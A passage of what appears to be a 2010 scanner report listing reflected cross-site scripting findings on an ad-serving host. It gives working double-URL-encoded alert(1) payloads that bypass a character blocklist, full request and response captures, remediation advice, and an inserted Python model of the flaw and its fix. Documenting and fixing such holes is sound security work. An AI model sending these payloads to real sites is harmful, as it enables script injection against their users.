GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30351b5%2522%253balert%25281%2529%252f%252f463fb0d5a8a/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30351b5";alert(1)//463fb0d5a8a/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29654e3442 was submitted in the REST URL parameter 3. This input was echoed as f7d5b"><script>alert(1)</script>e29654e3442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f7d5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29654e3442/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f7d5b"><script>alert(1)</script>e29654e3442/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f090d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24cabfa7af was submitted in the REST URL parameter 2. This input was echoed as f090d"><script>alert(1)</script>e24cabfa7af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357f090d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24cabfa7af/561.0.iframe.120x30/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357f090d"><script>alert(1)</script>e24cabfa7af/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6 was submitted in the REST URL parameter 2. This input was echoed as 7e78a";alert(1)//79b3c23bea6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313577e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6/561.0.iframe.120x30/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313577e78a";alert(1)//79b3c23bea6/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 481cf%2522%253balert%25281%2529%252f%252fb8c97658fa9 was submitted in the REST URL parameter 3. This input was echoed as 481cf";alert(1)//b8c97658fa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30481cf%2522%253balert%25281%2529%252f%252fb8c97658fa9/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30481cf";alert(1)//b8c97658fa9/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140 was submitted in the REST URL parameter 3. This input was echoed as f9245"><script>alert(1)</script>d30d10f1140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f9245"><script>alert(1)</script>d30d10f1140/" target="_blank" border="0" style="border:0px;">
...[SNIP]...
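The double-decoding flaw behind the ad.wsod.com findings (2.6 to 2.16 use the same two payloads against REST URL parameters 2 and 3), as an added example that is not code from this report or from ad.wsod.com: a Python model of a path segment the web server has percent-decoded once, a blocklist that checks that value before the application decodes it a second time, and a hardened renderer that skips the second decode, allowlists the canonical value and encodes it for the JavaScript-string and HTML-attribute contexts the responses above show. The templates, the blocked-character set and the allowlist pattern are assumptions, not the application's actual code.

```python
# Added example: models the double-URL-decode bypass reported against ad.wsod.com.
# Not code from the report or the site; templates, blocklist and allowlist are assumptions.
import html
import json
import re
from typing import Optional
from urllib.parse import unquote

# Characters the reported application appears to reject (assumption).
BLOCKED = frozenset('<>"\'')

# Legitimate segments in the report are hex ids and size tokens such as
# 561.0.iframe.120x30 (assumed allowlist for the canonical value).
SEGMENT_RE = re.compile(r"[0-9A-Za-z.]+")


def server_decode(raw_segment: str) -> str:
    """The web server's single percent-decode: %2522 becomes %22, %253c becomes %3c."""
    return unquote(raw_segment)


def blocklist_passes(segment: str) -> bool:
    """The naive check: reject only if a blocked character is literally present."""
    return not (BLOCKED & set(segment))


def vulnerable_render(segment: str) -> Optional[dict]:
    """Validate, then decode again: the order the report describes.

    Returns the JS-string and attribute fragments the value lands in,
    or None if the blocklist rejected the (still encoded) input."""
    if not blocklist_passes(segment):
        return None
    value = unquote(segment)  # second decode: %22 is now a literal double quote
    return {
        "js": f'var embedUrl = "//ad.wsod.com/embed/{value}/561.0.iframe.120x30/";',
        "attr": f'<a href="http://ad.wsod.com/click/{value}/" target="_blank">',
    }


def encode_for_contexts(value: str) -> dict:
    """Context-specific output encoding, independent of validation.

    A JSON string literal is a valid JS string literal; '<' is additionally
    escaped so a '</script>' inside the value cannot close the script block."""
    js_literal = json.dumps("//ad.wsod.com/embed/" + value + "/561.0.iframe.120x30/")
    js_literal = js_literal.replace("<", "\\u003c")
    return {
        "js": f"var embedUrl = {js_literal};",
        "attr": f'<a href="http://ad.wsod.com/click/{html.escape(value, quote=True)}/" target="_blank">',
    }


def hardened_render(segment: str) -> dict:
    """No second decode (the server already canonicalised the value), then
    allowlist validation on that canonical form, then per-context encoding."""
    if not SEGMENT_RE.fullmatch(segment):
        raise ValueError(f"rejected path segment: {segment!r}")
    return encode_for_contexts(segment)


if __name__ == "__main__":
    # Payloads copied from findings 2.6 and 2.8 above, as sent on the wire.
    for raw in ("7e78a%2522%253balert%25281%2529%252f%252f79b3c23bea6",
                "f9245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed30d10f1140"):
        once = server_decode(raw)
        print("blocklist passes:", blocklist_passes(once), "->", vulnerable_render(once))
        try:
            hardened_render(once)
        except ValueError as exc:
            print("hardened:", exc)
```

The two fixes are independent: dropping the second decode removes this particular bypass, and encoding at the point of output covers whatever the validation step misses. Validation happening on the canonical (already decoded) value is the general rule the remediation notes state.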

2.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b792%2522%253balert%25281%2529%252f%252fba89bde7c7b was submitted in the REST URL parameter 2. This input was echoed as 4b792";alert(1)//ba89bde7c7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574b792%2522%253balert%25281%2529%252f%252fba89bde7c7b/561.0.iframe.120x30/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313574b792";alert(1)//ba89bde7c7b/561.0.iframe.120x30/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601d4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e988e2cfa0 was submitted in the REST URL parameter 2. This input was echoed as 601d4"><script>alert(1)</script>9e988e2cfa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357601d4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e988e2cfa0/561.0.iframe.120x30/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357601d4"><script>alert(1)</script>9e988e2cfa0/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4831c%2522%253balert%25281%2529%252f%252f90c3c0b2505 was submitted in the REST URL parameter 3. This input was echoed as 4831c";alert(1)//90c3c0b2505 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x304831c%2522%253balert%25281%2529%252f%252f90c3c0b2505/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x304831c";alert(1)//90c3c0b2505/1292781966**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871**

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81ecb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80e4aff9d66 was submitted in the REST URL parameter 3. This input was echoed as 81ecb"><script>alert(1)</script>80e4aff9d66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x3081ecb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e80e4aff9d66/1292781871** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x3081ecb"><script>alert(1)</script>80e4aff9d66/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 774e0%2522%253balert%25281%2529%252f%252fc797c1e1737 was submitted in the REST URL parameter 2. This input was echoed as 774e0";alert(1)//c797c1e1737 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357774e0%2522%253balert%25281%2529%252f%252fc797c1e1737/561.0.iframe.120x30/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357774e0";alert(1)//c797c1e1737/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781871793740

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ecbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c82208ba9a was submitted in the REST URL parameter 2. This input was echoed as 4ecbc"><script>alert(1)</script>8c82208ba9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313574ecbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c82208ba9a/561.0.iframe.120x30/1292781871793740 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
